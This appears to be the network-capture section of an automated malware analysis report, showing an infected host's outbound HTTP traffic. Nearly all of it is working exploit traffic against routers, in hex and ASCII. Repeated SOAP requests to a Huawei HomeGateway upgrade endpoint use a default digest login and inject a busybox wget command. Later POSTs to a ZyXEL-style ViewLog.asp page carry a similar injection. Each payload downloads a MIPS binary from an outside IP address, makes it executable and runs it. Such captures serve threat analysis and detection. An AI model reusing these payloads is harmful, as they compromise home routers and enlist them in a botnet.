                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:18.086505890 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:20.518501997 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:25.382471085 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:34.854487896 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:54.310497046 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:33.222318888 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              243192.168.2.135415462.54.177.288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.504112959 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:16.712543011 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:16:16 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              244192.168.2.134841694.122.65.2558080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.504194021 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              245192.168.2.134442694.120.221.1118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.506655931 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              246192.168.2.134971662.29.49.128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:16.509512901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
